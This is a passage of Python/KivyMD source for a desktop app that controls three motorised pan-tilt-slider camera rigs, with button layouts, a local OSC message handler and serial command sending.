#on_release: app.sendCam1ZoomStop()
Button:
id: btnCam1Zm+
text:"Zm\\nIN"
halign: 'center'
pos: (app.xDiv*101), (app.yDiv*17)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.sendCam1ZoomIn()
#on_release: app.sendCam1ZoomStop()
Button:
id: cam1Record
pos: (app.xDiv*110), (app.yDiv*18)
size: (app.xDiv*11), (app.yDiv*4)
size_hint: None, None
font_size: (app.yDiv*2)
text: "Record"
background_normal: ''
background_color: get_color_from_hex("#666666")
on_press: app.sendCam1RecordToggle()
Button:
id: btnCam1Clr
text:"Clear"
pos: (app.xDiv*126), (app.yDiv*17)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam1ButColour)
on_press: app.sendClearCam1Pos()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam2Go1
text:"1"
pos: (app.xDiv*1), (app.yDiv*9)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.Cam2Go1()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam2Go2
text:"2"
pos: (app.xDiv*9), (app.yDiv*9)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.Cam2Go2()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam2Go3
text:"3"
pos: (app.xDiv*17), (app.yDiv*9)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.Cam2Go3()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam2Go4
text:"4"
pos: (app.xDiv*25), (app.yDiv*9)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.Cam2Go4()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam2Go5
text:"5"
pos: (app.xDiv*33), (app.yDiv*9)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.Cam2Go5()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam2Go6
text:"6"
pos: (app.xDiv*41), (app.yDiv*9)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.Cam2Go6()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam2PT-
text: "PT\\n-"
halign: 'center'
pos: (app.xDiv*51), (app.yDiv*9)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.sendCam2PTSpeedDec()
Button:
id: btnCam2PT+
text: "PT\\n+"
halign: 'center'
pos: (app.xDiv*64), (app.yDiv*9)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.sendCam2PTSpeedInc()
Button:
id: btnCam2Sl-
text: "Sl\\n-"
halign: 'center'
pos: (app.xDiv*72), (app.yDiv*9)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.sendCam2SliderSpeedDec()
Button:
id: btnCam2Sl+
text: "Sl\\n+"
halign: 'center'
pos: (app.xDiv*85), (app.yDiv*9)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.sendCam2SliderSpeedInc()
Button:
id: btnCam2Zm-
text:"Zm\\nOUT"
halign: 'center'
pos: (app.xDiv*93), (app.yDiv*9)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.sendCam2ZoomOut()
#on_release: app.sendCam2ZoomStop()
Button:
id: btnCam2Zm+
text:"Zm\\nIN"
halign: 'center'
pos: (app.xDiv*101), (app.yDiv*9)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.sendCam2ZoomIn()
#on_release: app.sendCam2ZoomStop()
Button:
id: cam2Record
#size_hint: 0.08, 0.056
#pos_hint: {'x':.825, 'y':.15}
pos: (app.xDiv*110), (app.yDiv*10)
size: (app.xDiv*11), (app.yDiv*4)
size_hint: None, None
font_size: (app.yDiv*2)
text: "Record"
background_normal: ''
background_color: get_color_from_hex("#666666")
on_press: app.sendCam2RecordToggle()
Button:
id: btnCam2Clr
text:"Clear"
#size_hint: 0.046, 0.086
#pos_hint: {'x':.94, 'y':.135}
pos: (app.xDiv*126), (app.yDiv*9)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam2ButColour)
on_press: app.sendClearCam2Pos()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam3Go1
text:"1"
pos: (app.xDiv*1), (app.yDiv*1)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.Cam3Go1()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam3Go2
text:"2"
pos: (app.xDiv*9), (app.yDiv*1)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.Cam3Go2()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam3Go3
text:"3"
pos: (app.xDiv*17), (app.yDiv*1)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.Cam3Go3()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam3Go4
text:"4"
pos: (app.xDiv*25), (app.yDiv*1)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.Cam3Go4()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam3Go5
text:"5"
pos: (app.xDiv*33), (app.yDiv*1)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.Cam3Go5()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam3Go6
text:"6"
pos: (app.xDiv*41), (app.yDiv*1)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*3)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.Cam3Go6()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
Button:
id: btnCam3PT-
text: "PT\\n-"
halign: 'center'
pos: (app.xDiv*51), (app.yDiv*1)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.sendCam3PTSpeedDec()
Button:
id: btnCam3PT+
text: "PT\\n+"
halign: 'center'
pos: (app.xDiv*64), (app.yDiv*1)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.sendCam3PTSpeedInc()
Button:
id: btnCam3Sl-
text: "Sl\\n-"
halign: 'center'
pos: (app.xDiv*72), (app.yDiv*1)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.sendCam3SliderSpeedDec()
Button:
id: btnCam3Sl+
text: "Sl\\n+"
halign: 'center'
pos: (app.xDiv*85), (app.yDiv*1)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.sendCam3SliderSpeedInc()
Button:
id: btnCam3Zm-
text:"Zm\\nOUT"
halign: 'center'
pos: (app.xDiv*93), (app.yDiv*1)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.sendCam3ZoomOut()
#on_release: app.sendCam3ZoomStop()
Button:
id: btnCam3Zm+
text:"Zm\\nIN"
halign: 'center'
pos: (app.xDiv*101), (app.yDiv*1)
size: (app.xDiv*4), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.sendCam3ZoomIn()
#on_release: app.sendCam3ZoomStop()
Button:
id: cam3Record
#size_hint: 0.08, 0.056
#pos_hint: {'x':.825, 'y':.04}
pos: (app.xDiv*110), (app.yDiv*2)
size: (app.xDiv*11), (app.yDiv*4)
size_hint: None, None
font_size: (app.yDiv*2)
text: "Record"
background_normal: ''
background_color: get_color_from_hex("#666666")
on_press: app.sendCam3RecordToggle()
Button:
id: btnCam3Clr
text:"Clear"
#size_hint: 0.046, 0.086
#pos_hint: {'x':.94, 'y':.025}
pos: (app.xDiv*126), (app.yDiv*1)
size: (app.xDiv*6), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
col: .13, .13, .13, 1
background_normal: ''
background_color: get_color_from_hex(app.Cam3ButColour)
on_press: app.sendClearCam3Pos()
canvas.before:
Color:
rgba: self.col
Line:
width: 4
rectangle: self.x, self.y, self.width, self.height
MDFillRoundFlatButton:
id: buttonWhichCam1
text: "Cam 1"
#user_font_size: "30sp"
line_width: 5
line_color: 1, 0, 0, 1
md_bg_color: get_color_from_hex("#208020")
pos: (app.xDiv*39.5), (app.yDiv*57)
size: (app.xDiv*8), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
on_release: app.whichCamSerial1()
MDFillRoundFlatButton:
id: buttonWhichCam2
text: "Cam 2"
#user_font_size: "30sp"
line_width: 5
line_color: .13, .13, .13, 1
md_bg_color: get_color_from_hex("#405C80")
pos: (app.xDiv*39.5), (app.yDiv*49)
size: (app.xDiv*8), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
on_release: app.whichCamSerial2()
MDFillRoundFlatButton:
id: buttonWhichCam3
text: "Cam 3"
#user_font_size: "30sp"
line_width: 5
line_color: .13, .13, .13, 1
md_bg_color: get_color_from_hex("#807100")
pos: (app.xDiv*39.5), (app.yDiv*41)
size: (app.xDiv*8), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
on_release: app.whichCamSerial3()
MDFillRoundFlatButton:
id: btn_Report
text: "Report"
user_font_size: "30sp"
line_width: 2
line_color: .13, .13, .13, 1
md_bg_color: get_color_from_hex("#757981")
pos: (app.xDiv*65), (app.yDiv*65.7)
size: (app.xDiv*8), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
on_release: app.btnReport()
MDFillRoundFlatButton:
id: btn_ReportPos
text: "Report Pos"
user_font_size: "30sp"
line_width: 2
line_color: .13, .13, .13, 1
md_bg_color: get_color_from_hex("#757981")
pos: (app.xDiv*78), (app.yDiv*65.7)
size: (app.xDiv*8), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
on_release: app.btnReportPos()
MDFillRoundFlatButton:
id: btn_ReportKey
text: "Report Key"
user_font_size: "30sp"
line_width: 2
line_color: .13, .13, .13, 1
md_bg_color: get_color_from_hex("#757981")
pos: (app.xDiv*94), (app.yDiv*65.7)
size: (app.xDiv*8), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
on_release: app.btnReportKey()
MDFillRoundFlatButton:
id: btn_scan
text: "Scan Ports"
user_font_size: "30sp"
line_width: 2
line_color: .13, .13, .13, 1
md_bg_color: get_color_from_hex("#757981")
pos: (app.xDiv*109), (app.yDiv*65.7)
size: (app.xDiv*8), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
on_release: app.on_btn_scan_release()
MDFillRoundFlatButton:
id: btn_help
text: "Help"
user_font_size: "30sp"
line_width: 2
line_color: .13, .13, .13, 1
md_bg_color: get_color_from_hex("#757981")
pos: (app.xDiv*124), (app.yDiv*65.7)
size: (app.xDiv*8), (app.yDiv*6)
size_hint: None, None
font_size: (app.yDiv*2)
on_release: app.on_btn_help_release()
"""
def filter_handler(address, *args):
global moveType
#print(f"{address}: {args}") # Debug - Watch incomming OSC events
if address == "/setPos":
MDApp.get_running_app().setPos(args[0])
elif address == "/Cam1Go1" and args[0] == 1:
MDApp.get_running_app().Cam1Go1()
elif address == "/Cam1Go2" and args[0] == 1:
MDApp.get_running_app().Cam1Go2()
elif address == "/Cam1Go3" and args[0] == 1:
MDApp.get_running_app().Cam1Go3()
elif address == "/Cam1Go4" and args[0] == 1:
MDApp.get_running_app().Cam1Go4()
elif address == "/Cam1Go5" and args[0] == 1:
MDApp.get_running_app().Cam1Go5()
elif address == "/Cam1Go6" and args[0] == 1:
MDApp.get_running_app().Cam1Go6()
elif address == "/Cam2Go1" and args[0] == 1:
MDApp.get_running_app().Cam2Go1()
elif address == "/Cam2Go2" and args[0] == 1:
MDApp.get_running_app().Cam2Go2()
elif address == "/Cam2Go3" and args[0] == 1:
MDApp.get_running_app().Cam2Go3()
elif address == "/Cam2Go4" and args[0] == 1:
MDApp.get_running_app().Cam2Go4()
elif address == "/Cam2Go5" and args[0] == 1:
MDApp.get_running_app().Cam2Go5()
elif address == "/Cam2Go6" and args[0] == 1:
MDApp.get_running_app().Cam2Go6()
elif address == "/Cam3Go1" and args[0] == 1:
MDApp.get_running_app().Cam3Go1()
elif address == "/Cam3Go2" and args[0] == 1:
MDApp.get_running_app().Cam3Go2()
elif address == "/Cam3Go3" and args[0] == 1:
MDApp.get_running_app().Cam3Go3()
elif address == "/Cam3Go4" and args[0] == 1:
MDApp.get_running_app().Cam3Go4()
elif address == "/Cam3Go5" and args[0] == 1:
MDApp.get_running_app().Cam3Go5()
elif address == "/Cam3Go6" and args[0] == 1:
MDApp.get_running_app().Cam3Go6()
elif address == "/Cam1PTSpdInc" and args[0] == 0:
MDApp.get_running_app().sendCam1PTSpeedInc()
elif address == "/Cam1PTSpdDec" and args[0] == 1:
MDApp.get_running_app().sendCam1PTSpeedDec()
elif address == "/Cam1SlSpdInc" and args[0] == 2:
MDApp.get_running_app().sendCam1SlSpeedInc()
elif address == "/Cam1SlSpdDec" and args[0] == 3:
MDApp.get_running_app().sendCam1SlSpeedDec()
elif address == "/Cam2PTSpd":
MDApp.get_running_app().sendCam2PTSpeedOSC(args[0])
elif address == "/Cam2SlSpd":
MDApp.get_running_app().sendCam2SlSpeedOSC(args[0])
elif address == "/Cam3PTSpdInc" and args[0] == 0:
MDApp.get_running_app().sendCam3PTSpeedInc()
elif address == "/Cam3PTSpdDec" and args[0] == 1:
MDApp.get_running_app().sendCam3PTSpeedDec()
elif address == "/Cam3SlSpdInc" and args[0] == 2:
MDApp.get_running_app().sendCam3SlSpeedInc()
elif address == "/Cam3SlSpdDec" and args[0] == 3:
MDApp.get_running_app().sendCam3SlSpeedDec()
elif address == "/Cam1ZoomIn" and args[0] == 1:
MDApp.get_running_app().sendCam1ZoomIn()
elif address == "/Cam1ZoomOut" and args[0] == 1:
MDApp.get_running_app().sendCam1ZoomOut()
elif address == "/Cam1ZoomStop" and args[0] == 1:
MDApp.get_running_app().sendCam1ZoomStop()
elif address == "/Cam2ZoomIn" and args[0] == 1:
MDApp.get_running_app().sendCam2ZoomIn()
elif address == "/Cam2ZoomOut" and args[0] == 1:
MDApp.get_running_app().sendCam2ZoomOut()
elif address == "/Cam2ZoomStop" and args[0] == 1:
MDApp.get_running_app().sendCam2ZoomStop()
elif address == "/Cam3ZoomIn" and args[0] == 1:
MDApp.get_running_app().sendCam3ZoomIn()
elif address == "/Cam3ZoomOut" and args[0] == 1:
MDApp.get_running_app().sendCam3ZoomOut()
elif address == "/Cam3ZoomStop" and args[0] == 1:
MDApp.get_running_app().sendCam3ZoomStop()
elif address == "/Cam1Clr" and args[0] == 1:
MDApp.get_running_app().sendClearCam1Pos()
elif address == "/Cam2Clr" and args[0] == 1:
MDApp.get_running_app().sendClearCam2Pos()
elif address == "/Cam3Clr" and args[0] == 1:
MDApp.get_running_app().sendClearCam3Pos()
elif address == "/Cam1Rec" and args[0] == 1:
MDApp.get_running_app().sendCam1RecordToggleOSC()
elif address == "/Cam2Rec" and args[0] == 1:
MDApp.get_running_app().sendCam2RecordToggleOSC()
elif address == "/Cam3Rec" and args[0] == 1:
MDApp.get_running_app().sendCam3RecordToggleOSC()
elif address == "/moveType" and args[0] == 1:
moveType = 1
MDApp.get_running_app().doButtonColours()
elif address == "/moveType" and args[0] == 2:
moveType = 2
MDApp.get_running_app().doButtonColours()
elif address == "/moveType" and args[0] == 3:
moveType = 3
MDApp.get_running_app().doButtonColours()
elif address == "/Cam1Left" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, 'a')
elif address == "/Cam1Right" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, 'd')
elif address == "/Cam1Up" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, 'w')
elif address == "/Cam1Down" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, 's')
elif address == "/Cam1SlLeft" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, ',')
elif address == "/Cam1SlRight" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, '.')
elif address == "/Cam1LeftRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, 'A')
elif address == "/Cam1RightRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, 'D')
elif address == "/Cam1UpRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, 'W')
elif address == "/Cam1DownRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, 'S')
elif address == "/Cam1SlLeftRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, '<')
elif address == "/Cam1SlRightRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(1, '>')
elif address == "/Cam2Left" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, 'a')
elif address == "/Cam2Right" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, 'd')
elif address == "/Cam2Up" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, 'w')
elif address == "/Cam2Down" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, 's')
elif address == "/Cam2SlLeft" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, ',')
elif address == "/Cam2SlRight" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, '.')
elif address == "/Cam2LeftRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, 'A')
elif address == "/Cam2RightRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, 'D')
elif address == "/Cam2UpRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, 'W')
elif address == "/Cam2DownRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, 'S')
elif address == "/Cam2SlLeftRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, '<')
elif address == "/Cam2SlRightRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(2, '>')
elif address == "/Cam3Left" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, 'a')
elif address == "/Cam3Right" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, 'd')
elif address == "/Cam3Up" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, 'w')
elif address == "/Cam3Down" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, 's')
elif address == "/Cam3SlLeft" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, ',')
elif address == "/Cam3SlRight" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, '.')
elif address == "/Cam3LeftRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, 'A')
elif address == "/Cam3RightRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, 'D')
elif address == "/Cam3UpRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, 'W')
elif address == "/Cam3DownRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, 'S')
elif address == "/Cam3SlLeftRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, '<')
elif address == "/Cam3SlRightRel" and args[0] == 1:
MDApp.get_running_app().OSC_on_press(3, '>')
elif address == "/Cam1PTSpeedInc" and args[0] == 1:
MDApp.get_running_app().sendCam1PTSpeedInc()
elif address == "/Cam1PTSpeedDec" and args[0] == 1:
MDApp.get_running_app().sendCam1PTSpeedDec()
elif address == "/Cam2PTSpeedInc" and args[0] == 1:
MDApp.get_running_app().sendCam2PTSpeedInc()
elif address == "/Cam2PTSpeedDec" and args[0] == 1:
MDApp.get_running_app().sendCam2PTSpeedDec()
elif address == "/Cam3PTSpeedInc" and args[0] == 1:
MDApp.get_running_app().sendCam3PTSpeedInc()
elif address == "/Cam3PTSpeedDec" and args[0] == 1:
MDApp.get_running_app().sendCam3PTSpeedDec()
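# Route every OSC address ("/*") through filter_handler, and open a UDP client
# used to send state feedback back to the control surface on cliPort.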
dispatcher = Dispatcher()
dispatcher.map("/*", filter_handler)
ip = "127.0.0.1"
srvPort = 6503
cliPort = 1337
client = SimpleUDPClient(ip, cliPort)
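# Runs a private asyncio event loop on a daemon thread so the OSC server can
# live alongside Kivy's own loop; adapted from the Kivy asyncio example.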
class EventLoopWorker(EventDispatcher):
__events__ = ('on_pulse',) # defines this EventDispatcher's sole event
def __init__(self):
super().__init__()
self._thread = threading.Thread(target=self._run_loop) # note the Thread target here
self._thread.daemon = True
self.loop = None
# the following are for the pulse() coroutine, see below
self._default_pulse = ['OSC Enabled\n']
self._pulse = None
self._pulse_task = None
def _run_loop(self):
self.loop = asyncio.get_event_loop_policy().new_event_loop()
asyncio.set_event_loop(self.loop)
self._restart_pulse()
# this example doesn't include any cleanup code, see the docs on how
# to properly set up and tear down an asyncio event loop
self.loop.run_forever()
def start(self):
self._thread.start()
async def pulse(self):
"""Core coroutine of this asyncio event loop.
Repeats a pulse message in a short interval on three channels:
- using `print()`
- by dispatching a Kivy event `on_pulse` with the help of `@mainthread`
- on the Kivy thread through `kivy_update_status()` with the help of
`@mainthread`
The decorator `@mainthread` is a convenience wrapper around
`Clock.schedule_once()` which ensures the callables run on the Kivy
thread.
"""
#for msg in self._pulse_messages():
# show it through the console:
#print(msg)
# `EventLoopWorker` is an `EventDispatcher` to which others can
# subscribe. See `display_on_pulse()` in `start_event_loop_thread()`
# on how it is bound to the `on_pulse` event. The indirection
# through the `notify()` function is necessary to apply the
# `@mainthread` decorator (left label):
# @mainthread
# def notify(text):
# self.dispatch('on_pulse', text)
# notify(msg) # dispatch the on_pulse event
# Same, but with a direct call instead of an event (right label):
#@mainthread
#def kivy_update_status(text):
# status_label = App.get_running_app().root.ids.status
# status_label.text = text
#kivy_update_status(msg) # control a Label directly
await asyncio.sleep(0.1)
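# The OSC UDP server is created inside the coroutine so it binds to this
# worker's event loop rather than Kivy's thread.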
server = AsyncIOOSCUDPServer((ip, srvPort), dispatcher, asyncio.get_event_loop())
transport, protocol = await server.create_serve_endpoint() # Create datagram endpoint and start serving
global resetButtons
resetButtons = True
def set_pulse_text(self, text):
self._pulse = text
self._restart_pulse()
def _restart_pulse(self):
"""Helper to start/reset the pulse task when the pulse changes."""
if self._pulse_task is not None:
self._pulse_task.cancel()
self._pulse_task = self.loop.create_task(self.pulse())
def on_pulse(self, *_):
"""An EventDispatcher event must have a corresponding method."""
pass
def _pulse_messages(self):
"""A generator providing an inexhaustible supply of pulse messages."""
while True:
if isinstance(self._pulse, str) and self._pulse != '':
pulse = self._pulse.split()
yield from pulse
else:
yield from self._default_pulse
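# Main KivyMD application. xDiv/yDiv are the layout grid units used throughout
# the KV string above; xScreen/yScreen are used to park the joystick dots
# off-screen when they are not being dragged.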
class PTSApp(MDApp):
xDiv = NumericProperty(xDivSet) # 10 / 1340
yDiv = NumericProperty(yDivSet) # 10 / 703
xScreen = NumericProperty(xScreenSet)
yScreen = NumericProperty(yScreenSet)
def __init__(self, *args, **kwargs):
global Cam1ButColour
global Cam2ButColour
global Cam3ButColour
self.Cam1ButColour = Cam1ButColour
self.Cam2ButColour = Cam2ButColour
self.Cam3ButColour = Cam3ButColour
self.uiDict = {}
self.device_name_list = []
self.serial_port = None
self.read_thread = None
#self.port_thread_lock = threading.Lock()
#base_path = Path(__file__).parent
#image_path = (base_path / "./PTSApp-Icon.png").resolve()
#self.icon = os.path.join(image_path)
super(PTSApp, self).__init__(*args, **kwargs)
self.event_loop_worker = None
def build(self):
global PTJoy
global srvPort
global cliPort
self.screen = Builder.load_string(KV)
Window.bind(mouse_pos=self.mouse_pos)
Window.bind(on_touch_up = self.on_touch_up)
Window.bind(on_request_close = self.stopping)
Window.bind(on_key_down = self.keyDown)
#listener = Listener(on_press = self.on_press, on_release=self.on_release)
#listener.start()
Clock.schedule_interval(self.flash, 1.0)
Clock.schedule_interval(self.doJoyMoves, 0.1)
self.start_event_loop_thread()
Clock.schedule_once(self.showPorts, 0)
self.icon = 'PTSApp-Icon.png'
return self.screen
def keyDown(self, instance, keyboard, keycode, text, modifiers):
global axisX
global axisY
global axisZ
global Cam1TextColour
global Cam2TextColour
global Cam3TextColour
if not self.root.ids.textInput.focus: # keycodes: a=4, s=22, d=7, w=26, ','=54, '.'=55
#print(keycode)
if keycode == 4:
axisX = -255
if keycode == 7:
axisX = 255
if keycode == 26:
axisY = -255
if keycode == 22:
axisY = 255
if keycode == 54:
axisZ = -255
if keycode == 55:
axisZ = 255
self.doJoyMoves(1)
self.doButtonColours()
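# Keycode 40 is Enter: prefix the typed command with "??", "!?" or "@?" to
# address camera 1, 2 or 3, then send it over the serial port.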
if keycode == 40 and self.root.ids.textInput.focus:
global whichCamSerial
if whichCamSerial == 1:
temp = "??"
elif whichCamSerial == 2:
temp = "!?"
elif whichCamSerial == 3:
temp = "@?"
tempInput = (self.root.ids.textInput.text)
temp += tempInput
#print(temp) # for debugging
if self.serial_port and self.serial_port.is_open:
self.sendSerial(str(temp.encode()))
Clock.schedule_once(self.clearTextInput, 0)
if whichCamSerial == 1:
self.root.ids.txtInput_read.text += ("[color=" + Cam1TextColour + "]Sent command: " + tempInput + "[/color]\n")
self.root.ids.scroll_view.scroll_y = 0
elif whichCamSerial == 2:
self.root.ids.txtInput_read.text += ("[color=" + Cam2TextColour + "]Sent command: " + tempInput + "[/color]\n")
self.root.ids.scroll_view.scroll_y = 0
elif whichCamSerial == 3:
self.root.ids.txtInput_read.text += ("[color=" + Cam3TextColour + "]Sent command: " + tempInput + "[/color]\n")
self.root.ids.scroll_view.scroll_y = 0
else:
self.root.ids.txtInput_read.text += "[color=#FFFFFF]Port not connected.\n[/color]"
textLength = len(self.root.ids.txtInput_read.text)
if textLength > 8000:
self.root.ids.txtInput_read.text = self.root.ids.txtInput_read.text[1000:textLength]
self.root.ids.scroll_view.scroll_y = 0
Clock.schedule_once(self.clearTextInput, 0)
def clearTextInput(self, dt):
self.root.ids.textInput.text = ""
def showPorts(self, dt):
#self.root.ids.OSCSend.text = "OSC Server Port: " + str(srvPort)
#self.root.ids.OSCRec.text = "OSC Client Port: " + str(cliPort)
return
